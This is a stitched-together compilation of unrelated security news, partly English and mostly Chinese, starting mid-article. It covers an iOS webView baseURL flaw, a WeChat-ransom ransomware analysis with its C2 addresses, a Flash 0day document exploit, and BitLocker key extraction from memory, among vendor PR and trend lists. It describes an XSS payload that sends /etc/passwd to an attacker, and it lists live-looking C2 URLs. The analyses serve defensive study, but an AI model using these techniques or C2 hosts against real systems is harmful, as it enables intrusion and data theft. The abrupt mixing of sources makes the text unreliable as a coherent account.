While it’s too early to figure out how much that cost is going to be, the changes that result from the effort to comply with the new standards could provide a good opportunity for vendors to differentiate themselves by understanding that the clients need these services. It’s also an opportunity to update cybersecurity provisions in general. Technology has changed the industry and risks have advanced, so vendors will need a number of cybersecurity offerings to have an updated IT contract.

本文介绍一个简单的，但是潜在危险性特别大、而且在iOS app中经常出现的安全漏洞。

该漏洞非常简单，但是常常被误解，当开发者在代码中是设置webView时，经常会看到：

许多开发者都认为设置baseURL为@””，表示是安全的，因为baseurl被指定为空字符串，攻击者也不能加载请求到随机的恶意网站。但事实上不是这样的。

当baseURL被设置为空字符串时，攻击者可以绕过SOP保护访问APP的文件系统（使用file:// url方案）和任何外部网站。

另一个需要注意的方法是loadData:MIMEType:textEncodingName:baseURL。

错误配置可以以多种方式利用。最常见的就是文件共享，用户可以在web视图中打开文件。比如一个简单的XSS payload：

这个简单的payload可以打开手机的/etc/passwd文件，然后发送其中的内容到攻击者服务器。

研究人员将其保存为.html文件，并于iCloud进行同步，然后再通过苹果的Files APP在APP内分享。

然后，当用户打开该文件时：

研究人员就接收到了用户的etc/passwd文件。

其他潜在的利用方法有：

APP内打开URL/Web浏览：攻击者可以发送给受害者一个恶意URL，当用户点击时，就可以在APP的web视图中打开链接。

URL scheme滥用：攻击者可以通过邮件或iMessage等外部通信方式发送一个恶意URL。如果打开链接的URL scheme在webView中，就可以进行利用。

应对该漏洞的最简单的办法就是将baseURL参数设置为about:blank而不是空字符串。比如：

现在webView已经从手机的文件系统中沙箱化了，攻击者可能可以进行弹窗，但是不能窃取数据或与恶意服务器进行通信。如果用户从文件系统中加载内嵌图像，该方案可能会干预APP的这一功能。

如果开发者选择使用新的WKWebView类，而不是老版本的UIWebView，那么这类攻击发生的可能性就会小很多。因为WKWebView增强了安全性，默认情况下不允许对本地文件系统进行AJAX请求，所以前面描述的攻击就都不能实现了。而且WKWebView还有一个开启/关闭javascript执行的新功能。

2018年12月1日，国内出现首个要求使用微信支付的勒索病毒，在网络中引起不小的恐慌。该勒索病毒病毒使用E语言开发，是有史以来第一款使用中文开发的勒索病毒。病毒运行后会加密当前桌面和非系统盘中的指定文件，中毒后重启机器会弹出勒索信息提示框，并附带二维码提示用户使用微信扫码支付110元赎金进行文件解密。

瑞星对该勒索病毒的生命周期做了详细分析，发现该病毒具有一定危害性，但并没有达到公众对其恐慌的级别。该病毒作者应属于初级开发水平，没有任何技术含量可言，唯一的亮点是其传播途径“供应链污染”。

1、加密算法简单，被勒索文件可以完全还原

病毒作者声称文件使用DES加密算法加密，加密密钥被上传到服务器。瑞星安全专家通过分析发现该病毒使用的是异或加密，所有文件使用同一密钥进行加密，并且密钥存储在本地。所以在本地密钥没有被删除的情况下，文件完全可以恢复。相比于国外流行的勒索使用对称非对称加密算法，该勒索病毒使用加密手法相对较弱。从中可以看出该病毒作者对加密算法掌握不深。

从C2配置文件的加密算法上也可以看出病毒作者使用的加密算法比较简单，病毒作者使用豆瓣、CSDN、简书、github等知名博客网站当作C2 存储配置信息。

病毒作者对于配置文件信息的解密算法，只是简单的分割字符减去101，没有任何复杂性可言。从病毒作者使用的种种加密算法上可以看出，该作者是一个初级的病毒开发者。

2、该病毒不会主动传播，感染范围可控

相于WanaCrypt勒索病毒利用永恒之蓝漏洞迅速传播全球，该勒索病毒没有任何主动传播途径，该病毒受害者都是在不知情的情况下运行了被插入病毒代码的软件，没有利用任何漏洞进行传播，所以病毒受害者范围都会控制在使用病毒软件的范围内，不会对其他未使用带毒软件的用户造成任何影响，这就说明该病毒不可能大规模、大范围的爆发。同时该病毒的易感人群为E语言爱好者，被植入病毒代码的软件大部分为黑灰产软件，对于普通人来说不用过度太担心。

3、病毒作者安全意识缺乏，被抓只是时间问题

第一、病毒作者使用微信支付的方式进行勒索。微信支付都要求实名，监管机构很容易通过微信收款账号查出收款人，即便病毒作者使用的是虚假微信收款账户，也能通过资金的流向定位到背后嫌疑人，所以通过微信来收款，完全是在作死。

第二、病毒作者将服务器的账号密码存放在C2的配置文件中。病毒作者对C2配置信息使用简单的加密方法，并将这些配置信息存放在一些公开的博文中，所以很容易解密这些配置信息。这些配置信息包括病毒服务器的FTP账号密码、mysql数据库账号密码，由此可见病毒作者的安全意识十分淡薄。

第三，在配置文件中解密出来的Mysql账号密码是该病毒作者的日常通用密码，通过该密码可以登录该病毒作者的微博、百度、360、爱奇艺、中关村在线、印象笔记等网站。通过这些网站也暴露了病毒作者的真实身份。

图：病毒作者某网站的后台登陆记录

病毒作者在后门的C2地址里留有两个未被注册的域名，一个是 www.lsy19960417.com ，另一个是 www . lsy 1 9960417.cn ，为了防止这两个域名被病毒作者或其他人控制，瑞星第一时间sinkhole了这两个域名，通过这两个域名的访问日志，瑞星可以掌握一些该病毒作者“经营”的势力范围。瑞星将访问C2的网络流量接入到了瑞星态势感知平台。

瑞星统计了潜在受害者的地域分布，通过分析发现，几乎全国各地都有感染者，排名靠前的有四川、河南和广东，说明该病毒作者通过供应链污染投毒还是挺成功的。

图：潜在受害者的地域分布

瑞星对病毒样本进行分析发现，通过供应链污染被病毒开发者植入的后门C2地址有5个，分别如下：

https://www.douban.com/note/694315517/

删除

G ithub

https://raw.githubusercontent.com/qq1790749886/javanet/

删除

作者持 有

http://www.myapplication.top/

不可解析

http://www.lsy19960417.com/

Sinkhole

http://www.lsy19960417.cn/

Sinkhole

图：病毒C2服务器信息

豆瓣地址已被工作人员删除，github上的C2地址也已被删除，估计是病毒作者所删。病毒作者持有的那个域名目前暂时不能解析，剩下两个被瑞星Sinkhole了，但病毒潜在的威胁仍然存在。

威胁存在于github和作者持有的域名上，那两个地址随时可能被病毒作者启用，投递其的恶意病毒，此次投递的是可解密的勒索病毒，下次可能就是升级版的不可解密的勒索病毒。

目前，瑞星公司所有产品均可对其进行拦截。

由公安部第一研究所指导，嘶吼传媒主办的2018年网络安全“金帽子”奖年度评选活动已经进入评审阶段。

大众可以参与评选的四个奖项（包括：年度新锐公司、年度最受关注安全应急响应中心、年度最具影响力安全会议以及金帽子明日之星）目前竞争激烈，一些参与者已经开始拉动身边的小伙伴们，为其评选奖项增加热度、助力投票了。

而其余的四个奖项（包括：年度杰出实验室、年度领先安全企业、年度优秀安全产品及年度贡献投资机构）由本届“金帽子”奖年度评选活动邀请的多位专家评审团及媒体评审团来进行专业的评审。

聚集安全圈内的众多大咖共同参与评审工作实属不易，由此可见“金帽子”奖年度评选活动的含金量还是具备较高水准的。

专家评审奖项已进入专家评审团及媒体评审团的评审阶段。下面给大家介绍下参与本活动专家评审的各位大咖们，他们都是各企业、各行业及安全圈内最可爱的人，看看你认识几位？（以下排序按姓氏拼音为序）

滴滴信息安全副总裁-卜铮

永信至诚董事长-蔡晶晶

平安科技CSO-陈建

腾讯云云鼎实验室主任-董志强

阿里巴巴安全部技术副总裁-杜跃进

清华大学教授-段海新

安恒信息CEO-范渊

蚂蚁金服安全产品技术部负责人-冯春培

CNNVD主任-郝永乐

公安部第一研究所信息安全部副主任-胡光俊

唯品会CSO-黄承

阿里集团安全部高级安全总监-黄眉

UCloud优刻得CEO-季昕华

拓尔思副总裁，天行网安CEO-令狐永兴

国家信息技术安全研究中心副总工-刘鸿运

百度安全事业部总经理-马杰

永信至诚高级副总裁，兼首席战略官-潘柱廷

360集团技术总裁，兼首席安全官-谭晓生

海康威视副总裁-王滨

未来安全CEO-王英键

解放军信息工程学院教授-魏强

360企业安全集团总裁-吴云坤

阿里云安全总监-肖力

国家开放大学产教融合研究中心副主任-徐守峰

浙江大学电器学院教授-徐文渊

知道创宇CEO-赵伟

360集团助理总裁-郑文彬

启明星辰助理总裁-朱钱杭

中国电信安全实验室负责人-朱易翔

CodeSec 主编-鲍弘捷

甲子光年联合创始人&执行主编-程曼祺

中国教育电视台移动互联网中心高级经理-丁孟良

看雪学院创始人-段钢

雷锋网网络安全频道&宅客主编-李勤

安全客媒体平台负责人-林伟

浅黑科技创始人-史中

IT168&ITPUB副总编-闫志坤

专家评审奖项（年度杰出实验室、年度领先安全企业、年度优秀安全产品及年度贡献投资机构）是不可以进行大众投票的，其结果直接取决于专家评审团和媒体评审团的参考意见。专家评审团和媒体评审团将从技术研发能力、应急响应能力、产品技术能力、团队能力、技术分析、技术分享、投资业绩以及影响力等多维度参考，并且以公平、公正、公开为原则进行评审。最终评审结果将于12月16日-30日期间公布。

Gigamon Applied Threat Research（ATR）根据Microsoft Office文档，确认了一次对Adobe Flash中0day漏洞的恶意利用。该漏洞（CVE-2018-15982）允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码，从而获取对系统命令行的访问权限。该文件是从一个位于乌克兰的IP地址提交到VirusTotal的，恶意文档伪装成提交给俄罗斯国家医疗诊所的求职申请。

本文主要对恶意文档（22.docx）进行分析，并详细分析了攻击链的技术细节，同时针对发现的一系列值得关注的特性进行了描述。此外，我们还研究了此次攻击与已知恶意活动之间的关联，从而更加广泛地了解如何能识别并检测出类似攻击。

Gigamon ATR在2018年11月29日（星期四）的上午2点向Adobe产品安全事件响应小组（PSIRT）报告了这一漏洞。Adobe迅速采取了措施，并与Gigamon ATR合作复现这一漏洞，在2018年12月5日发布了针对该漏洞的安全补丁，并为该漏洞分配编号CVE-2018-15982。

“22.docx”是以俄文写成的文档，伪装成俄罗斯国家医疗诊所的求职申请。在该文档中，包含7页个人相关信息，这些信息一般都会出现在个人求职申请之中。该文档的创建者为tvkisdsy。

我们对文档页头的LOGO进行分析，表明该文档是提交给俄罗斯国家医疗保健系统的“2号诊所”。2号综合诊所是一家位于俄罗斯莫斯科的成人门诊诊所。文档中包含的LOGO与该诊所的真实LOGO、公开网站上发现的LOGO均相符。

尽管诱饵文档看似具有高度针对性，但ATR早些时间已经观察到其他鱼叉式网络钓鱼攻击的诱饵文档与其实际的攻击目标无关，所以我们无法确认此次恶意活动所针对的目标。

该恶意活动所采用的攻击技术本质上非常简单。这些文档在头部包含一个嵌入式的Flash Active X控件（如下图所示），该控件会在文档打开时执行，并导致Office中的Flash播放器被恶意利用。在漏洞利用之后，将执行恶意命令，该命令尝试提取并执行文档附带的Payload。

尽管业界已经努力在最新版本的Web浏览器中放弃使用Flash并删除Flash组件，但Microsoft Office仍然能够加载和执行Flash内容。因此，攻击者利用这一0day漏洞发动攻击是有价值的，这些漏洞允许攻击者执行任意命令。因此，只要存在能够可靠执行的武器化工具，这一漏洞就可以被利用。

在这种特定情况下，Flash漏洞利用工具完全被封装在文档中，并且支持32位和64位系统（具有相应的ShellCode）。包含Flash文件的容器中存在一个硬编码路径“C:run.de.swf”，该路径可能代表武器化阶段的文件路径。Flash文件和ShellCode没有使用任何形式的远程调用、分阶段、模糊处理或反分析机制。在两个ShellCode中，都使用了相同的“cmd.exe”来执行恶意命令：

上述命令首先将同一目录下的任意.rar文档解压缩，然后从scan042.jpg中解压出backup.exe文件，然后执行backup.exe文件，也就是最终的Payload。

我们的测试表明，只要从压缩包中打开恶意文档，就能够使漏洞利用代码和最终Payload运行，用户不需要事先将恶意文档（诱饵文档）进行解压缩。

我们没有监测到这一恶意活动对受害者的攻击行为。然而，通过复现和进一步研究，我们根据提交的细节、预期行为、时间接近程度和文件名相似程度，发现了相关联的Payload，并将其标为中等偏高置信度。我们认为，该Payload是Scout恶意软件的变种。

最初在scan042.jpg中的Payload的文件名为backup.exe，这是一个Windows可执行文件，根据其元数据表明，它伪装成“NVIDIA控制面板”，并且具有相匹配的图标和详细信息。该可执行文件受到VMProtect保护，这是一种防止逆向工程和安全分析的机制。在执行时，Payload会收集系统信息，建立持久性，并通过HTTP POST与远程服务器通信。我们观察到，其表现出以下行为：

1、枚举系统信息（利用WMI查询在本地进行枚举）

2、通过计划任务的方式增加持久性：

(1) 将填充数据添加到backup.exe中

(2) 将填充二进制文件放在%LOCALAPPDATA%NVIDIAControlPanelNVIDIAControlPanel.exe的位置

(3) 设置在用户登录时启动

3、使用HTTP POST方式，将Base64编码后的内容发送到“dotted-quad”：

(2) 硬编码User-Agent字符串：Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36

(3) 在网络回调之间，休眠5分钟

下图展示了恶意软件创建的任务计划，以确保重新启动后具有持久性：

下午展示了恶意软件执行的网络回调示例：

backup.exe签署了一份合法的、现已被撤销的证书，该证书颁发给IKB SERVICE UK LTD，其序列号为57:5F:C1:C6:BC:47:F3:CF:AB:90:0C:6B:C1:8A:EF:6D，指纹为D8:7A:A2:1D:AB:22:C2:F1:23:26:0B:1D:7A:31:89:3C:75:66:B0:89。有效的证书往往会增强文件的可信度，可能会欺骗反病毒和自动检测系统。

下图展示了网络回调的周期性：

下图展示了用于签署恶意软件的合法证书：

我们对VirusTotal样本进行了人工分析，并发现该样本是0day漏洞利用文档，我们在得到该文档后的2小时内将其提交给Adobe。通过分析22.docx中保存的元数据，我们得出如下分析：

附加文档：利用文档中的创建者字段，我们在短时间之内就找到了同一国家相同VirusTotal ID提交的另一个文档（33.docx）。第二个文件几乎包含相同的内容，其中包括CVE-2018-15982的利用。第二份文件中还包含一个名为“Кирдакова”（Kirdakova）的文件修改者，这是一个普通的俄罗斯姓氏。此外，还包含一个公司字段“Uito”。

相关Payload：在识别出恶意文档可能使用的文件名后，我们在VirusTotal中筛选了特定范围的文件（通过提交者ID、国家和时间范围）。将压缩包附加到图像中，是一种常见的恶意技术，WinRAR仍然可以识别并解压缩这样的压缩包。

相关恶意二进制文件：通过对我们已经获得的样本进行分析，我们获取了样本的证书，并识别出另一个创建时间更早的文件（c2a827cd8aefa54fb2f91b0f767292d94f5ef7dde9c29090e6be21d34efd1449.exe）。

HackingTeam是意大利的一家安全公司，该公司销售远程访问和远程监控工具，并提供相应服务。该公司在2015年遭到黑客入侵，攻击者将其内部数据（例如电子邮件和源代码）传播出去，并据此制作了一系列后门和漏洞。在这一信息泄露事件发生后，世界各地的攻击者纷纷利用HackingTeam工具实现恶意活动。本次漏洞利用的工具比较可靠，并且是针对特定未修复的漏洞。

我们根据漏洞利用过程和Payload的使用，发现此次攻击采用的技术与HackingTeam使用的相类似。将此次恶意活动与之前HackingTeam活动相对比，其共同点在于：

1、都使用了VMProtect进行保护。

2、二者都使用经过数字签名的Payload和伪造的元数据，伪装成合法的应用程序。

3、在ESET发布关于HackingTeam和Callisto Group恶意活动报告后不到一周，此次恶意活动所使用的证书就已经创建。尽管我们不能确定，但该证书可能是此前Callisto Group恶意活动的后续活动。

4、我们分析的Scout Payload，与ESET分析的威胁使用了相同的内容填充二进制文件。

5、多个反病毒产品都将Payload检测为CrisisHT（HackingTeam）。

6、在恶意文档中使用了相似的0day攻击技术，特别是嵌入在Microsoft Office文档中的恶意代码。这些漏洞利用程序同时包含支持32位和64位的漏洞利用工具以及ShellCode。

我们之所以没有确切地将该恶意活动与这个黑客组织相关联，主要是因为以下两个原因：

1、恶意人员利用泄露的源代码，可以轻易模仿并改写一个新的HackingTeam TTP工具。

2、该样本中缺少远程包含或额外Web请求漏洞利用组件，而HackingTeam在2013年就使用了这些组件。

考虑到上述因素，并且鉴于我们目前有限的证据，我们很难准确判断出此次恶意活动的幕后元凶。但实际上，无论是这个黑客团队还是模仿者所为并不重要，重要的是有效的0day漏洞仍在被广泛用于针对特定目标的攻击之中。

原文链接：

Marketing for information security products is filled with buzzwords of the day, especially when looking at artificial intelligence and machine learning. Even by themselves, AI/ML are hard words to define, so how do decision-makers untangle the marketing jargon to really understand what they are buying? Before purchasing a security solution, decision-makers need to look under the covers at what security vendors are offering in the way of artificial intelligence and machine learning.

Easier said than done? Not if you ask the right questions. Security decision makers should ask the following questions before purchasing to dig deeper into marketing claims made by security vendors:

What are the technical components of AI/ML in the product?Vendors that say they use AI to solve security problems aren’t telling us much. Sometimes a product uses simple classification algorithms on a single type of data and, based on that, makes huge claims about the inclusion of AI/ML. As a buyer, you need to dig deeper by asking what algorithms and frameworks are being used, and whether the vendor developed custom solutions or integrated existing algorithms.

Getting the vendor to talk about the implementation allows you to assess whether it’s a point AI/MLsolution or a way to bring AI/ML to security data in a more comprehensive way.Transparency is the key here. There is no right answer we are looking for; the only wrong answer may be when a vendor refuses to disclose what goes into their use of AI/ML.

How flexible are the AI/ML models?Algorithms are usually only a small component of how data flows through an enterprise’s security system. A vendor claiming their proprietary AI/ML model will solve all your problems should raise red flags. Dig deeper by asking whether their model can be altered by you, the customer. Also important to know is whether you can use different models on your data, or are you locked in to certain bundled algorithms on specific data. Everyone’s enterprise is different, and that includes their security needs. There is no one size fits all.

What are the applications of the AI/ML models?Before purchasing, security decision-makers need to understand how AI/ML models are currently being used in potential products. Are models being applied to different types of data sets or is the application limited and myopic? In a modern security practice, looking only at log data is no longer enough. Enterprises deal with myriad data sets; for example, audio data from phone recordings, video data from security cameras and other sources such as transactional data. Can the product work with and apply AI/ML to these data sets as well or is the product a siloed solution? Applying AI/ML to data can be great, but an organization’s data stretches across data silos, and if AI/ML only works on certain silos, something may be missing .

How will new AI/ML approaches be incorporated into the solution?In the security space, adversaries are always evolving. It only makes sense that an AI/ML solution also evolves to meet these new threats. Vendors should be able to describe how updates to their algorithms work as well as provide examples of when past AI/ML was incorporated into their solution and how that development, testing, implementation and licensing played out. The last component, licensing, is critical. Was an organization’s data held hostage and kept away from new AI/ML until a fee was paid to apply the algorithm? This isn’t necessarily bad especially if the new AI/ML was developed by the vendor. If a vendor simply implemented someone else’s algorithm on the data when the licensing fee was paid, then that’s something an InfoSec practitioner needs to know.

Does the product advance the security team’s data knowledge and skills?Before purchasing a solution, it is important to know whether the platform allows security practitioners to apply the latest AI/ML toolkits. Decision-makers should ask whether the solution helps their internal practitioners learn how data works and grow their understanding of data engineering and data science as it pertains to the organization’s InfoSec data, or whether the solution is a black box that forces their organization to rely on the expertise of the vendor to solve security problems. A balance must be struck between working with vendors and growing an internal talent pool.

A product that fosters growth not only will serve the organization better, but also will help the organization attract smart data-driven security analysts. When you consider how tight and finite the pool of data scientists currently is, having cutting-edge technology that advances the security team’s knowledge is essential to wooing new talent.

By digging deep and asking these five questions before making a purchase, security decision-makers will be better informed. And being more informed will likely lead to a more successful implementation and better security outcomes for their enterprise.

10. Investment / funding for SMEs

As established enterprises wrestle with becoming more innovative and agile, ‘buying in’ that mindset and approach will be an increasingly attractive option. For start-ups and SMEs, the benefit is being able to access funding and support from a wide range of sources and being able to tap into the much wider resources of larger organisations, without necessarily compromising their independence.

Whether through financial investment, accessing IP or simply agreeing a mutual sharing of resources, 2019 will see increased partnerships and collaborations between established manufacturers and smaller operators.

9. Better diversity

2018 saw the continuation of a major conversation and focus on diversity across all levels of society. From a manufacturing perspective, the business case is clear an organisation is likely to perform better financially if its workforce is more diverse. Diversity is going to continue to be top of the agenda for many years to come, and with greater public awareness will come increased government scrutiny and tougher legislation.

Forward thinking businesses will pre-empt this by implementing more rigorous and impactful programmes to accelerate the diversification of their workforces.

8. Workforce of the future

Digitalisation holds great promise for manufacturers, yet it is not an off the shelf solution. Any sort of transformation is as much about the people implementing it as it is about the technology. With digital skills a scarce resource, manufacturers need to be investing now to ensure that they are building a workforce of the future. 2019 will see increased investment in digital training, both internally and in partnership with centres of education, such as universities and accelerators.

Partnering with complementary businesses will also help bring knowledge into businesses in a cost-effective manner.

7. AI/Machine Learning

The increased adoption of IoT will also see an increase in the amount of data that manufacturers produce. Data may be the crude oil of the 21st century, but without the ability to analyse and action based on tangible, accurate insights, it is simply taking up space. This is where artificial intelligence (AI) and machine learning comes in having the ability to manage volumes of data, generate legible insights and proffer solutions will greatly increase manufacturers’ responsiveness, improving efficiency and helping identify new business opportunities.

2019 will see greater levels of importance attached to manufacturers’ ability to incorporate AI and machine learning into their operations.

6. 5G rollout

5G will deliver huge improvements in download speeds, latency reduction and the ability to remotely control a vast array of devices. 2019 will be the year that the groundwork and preparation for 5G rollout really picks up, with the potential for the beginning of a limited rollout by the end of the year.

For manufacturers looking to fully invest in IoT this will be a huge gamechanger, giving them true real-time control and insight which will result in being able to make faster, more impactful decisions.

See also

5. Blockchain boom

Almost unheard of by anybody outside the cryptocurrency-sphere until 2017-18, blockchain is now taking the manufacturing world by storm. The coming year will see a direct impact of blockchain on financial operations, boosting speed, security and a cost-effective solution to transactions.

Looking at the supply chain, blockchain technologies will also influence different areas from management, tracking and transaction reporting.

4. AR and VR enhancement

The majority of manufacturers, or those working in the sector, have encountered some form of virtual or augmented reality in recent years. Whether it is quirky start-ups or large-scale global brands, we are set to see more of this technology incorporated into existing processes and products to enhance overall experience.

We will continue to see new companies emerge, identifying innovative ways of adopting it, while established organisations will mine their business to uncover areas of improvement.

3. Cyber security

Cyber threats will continue to dominate technology spending. As companies become more digital, and increase their connected footprint, they will be increasingly exposed to cyber criminals. At the same time, they need to balance the need for security with the need to be able to innovate.

Businesses will need to develop new ways of securing their operations, with a growing realisation that the firewall approach isn’t fit for purpose, either in preventing breaches or allowing them to be more agile.

2. IoT expansion

It is widely accepted that the Internet of Things (IoT) market is growing at an exponential rate and becoming the norm for many, with 3.6 bn connected devices used for daily tasks this year. In 2019, we can expect this growth to continue to spread.

Boosted by 5G connectivity and advances in sensor technology, the manufacturing industry will see more IoT devices than ever before to drive forward the industrial revolution.

1. Industry university collaboration

本文章将深入讲解Bitlocker的加密机制，并提供实战的思路供读者操作，基于的是windows7下未全盘加密的NTFS文件系统。

Windows 7 SP1 x64

BitLocker驱动器加密（BDE）是Microsoft Windows在Vista中使用的volume加密。BitLocker驱动器加密（BDE）有多个版本：

BitLocker Windows Vista和BitLocker Windows 7都旨在加密固定存储介质（如硬盘）上的NTFS卷。BitLocker To Go是在Windows 7中引入的，旨在加密可移动驱动器，例如FAT文件系统的可移动存储设备(U盘)，可移动驱动器上的NTFS卷被视为固定存储介质上的NTFS卷。

BitLocker标识符(GUID):4967d63b-2e29-4ad8-8399-f6a339e3d0

BitLocker To Go标识符(GUID):4967d63b-2e29-4ad8-8399-f6a339e3d01

BitLocker使用不同类型的密钥加密存储介质。

卷主密钥(VMK)的大小为256位，存储在多个FVE卷主密钥(VMK)结构中。VMK存储时使用恢复密钥、外部密钥或TPM加密。

VMK也可能不作为加密密钥存储，这样的VMK称为清除密钥。

全卷加密密钥（FVEK）使用卷主密钥（VMK）加密存储。FVEK的大小取决于使用的加密方法：

当使用Elephant Diffuser时，保存FKEV结构的关键数据大小总是512位。第一个256位用于保存FVEK，另一个256位用于保留TWEAK键。当加密方法为AES 128位时，256位中只有128位被使用。

TWEAK使用卷主密钥（VMK）加密存储。TWEAK密钥的大小取决于使用的加密方法：

TWEAK密钥仅在使用Elephant Diffuser时出现。

BitLocker提供恢复（或数字）密码来解锁加密数据。恢复密码用于确定恢复密钥。

恢复密码示例：

有效的恢复密码由48位数字组成，分为8组，其中每组数字都可以被11整除，余数为0。每组数字除以11的结果是一个16位的值，单独的16位值组成128位的密钥。

清除密钥是存储在卷上的未受保护的256位密钥，用于解密VMK。在解密加密卷时使用它。

BitLocker使用不同类型的加密方法，为了加密扇区数据，它使用带有或不带有Elephant Elephant Diffuser的AES-CBC模式。为了加密密钥数据，BitLocker使用AES-CCM模式。

加密和解密都使用：

AES-CBC与FVEK解密扇区数据

加密过程：

解密过程：

密钥数据使用初始化向量为0的AES-CCM模式加密。

BitLocker Windows 7（及更高版本）卷标题与BitLocker Windows Vista卷标题类似于NTFS卷标题。卷标头大小为512字节，包括：

BitLocker卷包含3个FVE元数据块。每个FVE元数据块包括：

大小为64字节，包括：

解密BitLocker时会从后向前解密。因此，加密的卷大小包含仍然加密（或需要解密）的卷的字节数。

版本1，大小为48字节，包括：

版本1，大小可变，包括：

BitLocker外键（BEK）文件通常为156字节大小，包括：

BEK文件头类似于FVE元数据头，大小为48字节，包括：

BEK元数据条目的格式类似于FVE元数据条目的格式。

BEK文件中的元数据由FVE外部密钥组成，该外部密钥包含256位未受保护的密钥数据。

VMK的标识符应与BEK文件头中的标识符匹配。

通过上述讲解，可知成功解密的关键，是拿到bitlocker的FVEK和TWEAK，我们可以利用volatility的bitlocker插件对休眠文件、内存文件进行分析提取它。这里我用了一个win7硬盘试验，成功解密。

从扇区41947136开始的最后一个分区（该硬盘原有两个分区，C分区和D分区，其中C分区未被加密，D分区是经过bitlocker加密的加密卷）是受BitLocker保护的。可以通过查看文件系统头来验证它。发现“-FVE-FS-”签名。

该插件扫描内存映像以查找BitLocker加密分配（内存池）并提取AES密钥（FVEK: 完整的卷加密密钥）。

我们可以看到分析出了FVEK以及TWEAK，采取的加密方式为AES-128，如果是win8以上，可能会出现AES-256。

解密成功！

阅读： 44

自古至今，情报对于战争都是珍贵的信息资源，可以预先知晓对方的策略、手段、决策等信息，有些情报会对战争的结果起到决定性的作用，更有甚者可能直接影响历史的走向。而在网络安全的世界，攻防信息不对称一直是亟待解决的问题，而威胁情报在这几年开始渐渐走入人们的视线，从理论研究进入落地实践，对企业安全防御来说“化被动为主动”，可以预先获取攻击者的攻击工具、攻击途径、攻击意图等信息，进一步在企业安全防御中发挥重要作用。本文将结合绿盟威胁情报中心（NSFOCUS Threat Intelligence center, 简称“NTI”）的发展介绍目前威胁情报的实际落地应用场景。

知己知彼，百战不殆；不知彼而知己，一胜一负；不知彼不知己，每战必殆。

――《孙子谋攻篇》

情报是我们了解敌人和敌国的全部材料，是我们一切行动和想法的基础。

――《战争论》第一卷

绿盟威胁情报中心是绿盟科技依赖多年的安全经验和情报数据积累推出的一款威胁情报分析和共享平台，可为用户提供及时准确的威胁情报数据。借助NTI的威胁情报支撑，用户可及时洞悉公网资产面临的安全威胁进行准确预警，了解最新的威胁动态，实施积极主动的威胁防御和快速响应策略，结合安全数据的深度分析全面掌握安全威胁态势，并准确地进行威胁追踪和攻击溯源。

依托绿盟科技在安全领域的长期积累，结合客户实际安全需求，绿盟威胁情报中心可为客户实现以下应用场景：

文章目录

绿盟威胁情报中心结合绿盟科技自研情报、互联网情报以及第三方合作机构共享情报进行深度挖掘和关联分析，获得高质量的多维度威胁情报，全面覆盖作战情报（网络资产基础信息、指纹、漏洞库等）战术情报TTP（战术、技术手段、过程）、战略情报（高级威胁分析报告等）等不同层面，从而帮助用户洞察威胁趋势，预先采取措施防御可能发生的攻击。

绿盟威胁情报中心可以从互联网空间每天发生的海量安全事件提炼最受关注的热点威胁事件，如突发漏洞、恶意样本、数据泄露事件等，并由绿盟科技安全研究团队进行持续跟踪和深度分析，第一时间帮忙用户全面深入了解事件的技术原理，并提供自查和防御解决方案。

互联网资产暴露在外部网络，直面互联网上各种安全威胁，因此互联网资产的安全管理对于企业资产管理尤为重要。绿盟威胁情报中心覆盖数亿公网资产（如服务器、DNS、路由器、工控设备、智能设备等），数亿公网web资产（包括域名、服务和应用、版本等），近200种应用（如Apache、OpenSSH、IIS、Nginx等），30多种服务（如SSH、FTP、DNS等），汇集100+端口协议，并与漏洞、IP、URL等进行了深度多重关联分析，可为企业提供资产发现能力，帮助用户秒速快速发现其资产在互联网上的暴露面和安全状况，同时输出完善的报表协助用户处理安全威胁。

绿盟威胁情报中心支持将最新的威胁情报，如IP情报（扫描IP、僵尸网络、垃圾邮件服务、恶意IP等）、URL情报（钓鱼、欺诈、篡改、挂马等）、漏洞、文件等实时推送给用户本地部署的绿盟设备和平台型安全设施，增强安全设施的检测和防御能力，及时阻断和防御安全威胁，快速提高应急响应速度，进入智能安全防护时代。

依托绿盟威胁情报中心的十几种深度关联（如IP关联域名、域名关联IP、IP关联ASN、域名关联whois等）、机器自学习、安全评分机制和多元分析能力等，用户可从海量的事件信息中识别出可能的高危攻击事件，针对安全事件进行追踪溯源，锁定安全事件元凶，并进行可视化展示。

摘要: 2018年11月5日至10日，首届中国国际进口博览会在上海举办；11月7日至9日，第五届世界互联网大会在浙江省嘉兴市顺利召开。 图源：中国国际进口博览会官网 图源：世界互联网大会官网 今年的世界互联网大会与首届中国国际进口博览会时间重叠、地域相连，嘉...

2018年11月5日至10日，首届中国国际进口博览会在上海举办；11月7日至9日，第五届世界互联网大会在浙江省嘉兴市顺利召开。

图源：中国国际进口博览会官网

图源：世界互联网大会官网

今年的世界互联网大会与首届中国国际进口博览会时间重叠、地域相连，嘉兴市公安机关既要打好“主战场”，又要筑牢“护城河”，网络安全保障任务重、要求高、挑战多。

在浙江省委、省政府的领导下，杭州世平信息科技有限公司作为资质过硬的浙江省本地安全企业，协助嘉兴市公安局网警支队参加中国国际进口博览会与世界互联网大会的网络安全保障工作，并最终圆满完成任务，得到了大会组委会和部、省各级领导的高度评价！

会后，嘉兴市公安局网警支队发来感谢信，对杭州世平信息科技有限公司做出的贡献表示感谢及肯定。

“没有网络安全，就没有国家安全。”

世平信息将坚持

“智能化数据治理与数据安全防护”的战略定位，

为全国的网络安全事业保驾护航，

为中国网络安全行业贡献专业的力量。

杭州世平信息科技有限公司（简称“世平信息”），致力于智能化数据管理与应用的深入开拓和持续创新，为用户提供数据安全、数据治理、数据共享和数据利用解决方案，帮助用户切实把握大数据价值与信息安全。

相关文章 揭秘中国国际进口博览会网络安全背后的力量 【安全帮】广州出现“隔空盗刷”案：芯片卡小额免密，被伪装POS机隔包盗刷 阳光保险―数字化转型下的企业数据安全之道 研究人员发现新的类 Spectre 攻击 SplitSpectre 那个“居然敢微信收款”的勒索病毒制造者已被东莞警方抓获！

随着金融行业“互联网+”战略的快速发展，信息安全早已经和业务融合在一起，日益复杂的网络安全态势也对金融行业的各个企业提出高的要求，尤其是在安全防护能力上。

业务压力大、缺钱少人、运维管理难度大，中小银行在信息建设上存在不少的门槛，而银行类业务涉及重要数据越来越多、安全设备繁杂，外部攻击也越来越多样化。传统的安全防护体系已经越来越落后，根据自身情况在人力、资金有限的情况如何制定合适的策略应对大数据环境下的安全威胁，这已经是多数银行企业面临的问题。

